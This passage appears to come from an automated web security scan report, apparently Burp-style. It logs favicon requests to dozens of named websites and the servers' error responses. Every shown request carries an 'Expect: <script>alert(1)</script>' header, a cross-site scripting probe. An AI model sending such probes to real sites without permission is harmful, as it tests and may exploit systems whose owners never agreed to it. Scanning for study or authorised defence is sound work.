Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.63</center>
</body>
</html>

16.93. http://www.myhealthwealthandhappiness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myhealthwealthandhappiness.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myhealthwealthandhappiness.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 133
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:41:51 GMT

<html>
<head><title>Error</title></head>
We are sorry but an error has occurred. Please hit the back button and try again.
</html>

16.94. http://www.myhuckleberry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myhuckleberry.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myhuckleberry.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:19:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.95. http://www.newretirement.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newretirement.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newretirement.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:58:25 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.96. http://www.news-medical.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.news-medical.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.news-medical.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:02:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.97. http://www.newssearchonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newssearchonline.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newssearchonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

16.98. http://www.nwf.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nwf.org
Path:	/favicon.ico

Request

Response

16.99. http://www.optimalfusion.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.optimalfusion.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.optimalfusion.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:08:29 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

16.100. http://www.oview.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oview.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oview.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 208
Expires: Fri, 01 Apr 2011 15:44:45 GMT
Date: Fri, 01 Apr 2011 15:44:45 GMT
Connection: close

<HTML><HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD><BODY>
<H1>Invalid URL</H1>
The requested URL "/favicon.ico", is invalid.<p>
Reference #9.5dce8f18.1301672685.15e8e41
</BODY>
...[SNIP]...

16.101. http://www.owners.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owners.com
Path:	/favicon.ico

Request

Response

16.102. http://www.paulsnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paulsnetwork.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paulsnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Fri, 01 Apr 2011 16:40:50 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.103. http://www.personalizationmall.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalizationmall.com
Path:	/favicon.ico

Request

Response

16.104. http://www.printfree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.printfree.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.printfree.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Fri, 01 Apr 2011 17:15:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.105. http://www.prize-pending.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prize-pending.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prize-pending.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:19:54 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Fri, 01 Apr 2011 16:19:54 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

16.106. http://www.quickyellow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quickyellow.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quickyellow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Date: Fri, 01 Apr 2011 16:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.quickyellow.com/favicon.ico
Content-Length: 241
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1><p>You don't have permission to access http://www.quickyellow.com/favic
...[SNIP]...

16.107. http://www.quizbar.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quizbar.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quizbar.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 01 Apr 2011 15:44:32 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

16.108. http://www.rcuniverse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rcuniverse.com
Path:	/favicon.ico

Request

Response

16.109. http://www.redrobin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redrobin.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redrobin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:21:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.110. http://www.roirocket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.roirocket.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.roirocket.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:50:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.111. http://www.rubytuesday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rubytuesday.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rubytuesday.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:39:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.112. http://www.sanityswitch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sanityswitch.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sanityswitch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET 2x8
Date: Fri, 01 Apr 2011 15:23:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.113. http://www.santanderconsumerusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.santanderconsumerusa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.santanderconsumerusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 134
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:54:16 GMT

<HTML>
<HEAD>

<meta http-equiv="Refresh" content="0;URL=http://www.santanderconsumerusa.com/default.aspx" />

</HEAD>
</HTML>

16.114. http://www.scriptpulse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scriptpulse.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scriptpulse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.36
Date: Fri, 01 Apr 2011 16:20:16 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.36</center>
</body>
</html>

16.115. http://www.searchzue.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.searchzue.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchzue.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 16:11:23 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

16.116. http://www.seekysearch.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seekysearch.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seekysearch.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 15:21:16 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

16.117. http://www.smartquote.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smartquote.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartquote.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 30325
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:34:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" >
<hea
...[SNIP]...

16.118. http://www.soap.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soap.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soap.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 01 Apr 2011 15:37:16 GMT
Content-Length: 60
Set-Cookie: NSC_tpbq-xxx=ffffffff096c184145525d5f4f58455e445a4a423662;path=/;httponly

The page cannot be displayed because the expectation failed.

16.119. http://www.southwestvacations.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.southwestvacations.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.southwestvacations.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:18:14 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.120. http://www.starbucksstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.starbucksstore.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.starbucksstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Fri, 01 Apr 2011 16:11:42 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

16.121. http://www.sulekha.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sulekha.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sulekha.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:40:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.122. http://www.sun.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sun.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 01 Apr 2011 15:57:43 GMT
P3p: policyref="http://www.sun.com/p3p/Sun_P3P_Policy.xml", CP="CAO DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONi TELi OUR SAMi PUBi IND PHY ONL PUR COM NAV INT DEM CNT STA POL PRE GOV"
Cache-control: public
Content-length: 147
Content-type: text/html

<HTML><HEAD><TITLE>Expectation Failed</TITLE></HEAD>
<BODY><H1>Expectation Failed</H1>
The server is unable to process your request.
</BODY></HTML>

16.123. http://www.super-survey.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.super-survey.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.super-survey.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 17:14:06 GMT
Server: Apache 1.3.33

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.124. http://www.teenchat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teenchat.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teenchat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Connection: close
Content-Type: text/html
Content-Length: 363
Date: Fri, 01 Apr 2011 15:28:35 GMT
Server: HomeGrownServerFu

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.125. http://www.tennis-warehouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tennis-warehouse.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tennis-warehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:14:10 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 02 Mar 2005 01:31:45 GMT
Content-Length: 1406
Content-Type: text/html

..............h.......(....... ...........@............................nL......................H*......de.......{..........0.......Y-..............{u..TC......C........|..h?.......h..{Z.......... ....
...[SNIP]...

16.126. http://www.toonier.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toonier.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toonier.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 01 Apr 2011 16:32:14 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=600
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

16.127. http://www.tstickets.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tstickets.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tstickets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 01 Apr 2011 16:21:29 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

16.128. http://www.tubedspots.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tubedspots.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubedspots.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 01 Apr 2011 15:54:24 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

16.129. http://www.turbolovervidz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.turbolovervidz.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.turbolovervidz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 01 Apr 2011 16:15:13 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

16.130. http://www.ultra18.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ultra18.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ultra18.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 01 Apr 2011 17:05:01 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.67</center>
</body>
</html>

16.131. http://www.usairwaysvacations.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usairwaysvacations.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usairwaysvacations.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:39:33 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...

16.132. http://www.venus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.venus.com
Path:	/favicon.ico

Request

Response

16.133. http://www.w3i.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3i.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.w3i.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: policyref="http://www.w3i.com/w3c/p3p.xml", CP="NON DSP COR CURa TIA"
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:38:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.134. http://www.web.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.web.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.web.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:41:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.135. http://www.williamsauction.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.williamsauction.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.williamsauction.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:53:30 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.136. http://www.yellowusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yellowusa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:44:39 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.137. http://www.youngcourtesans.com/favicon.ico previous next

Summary

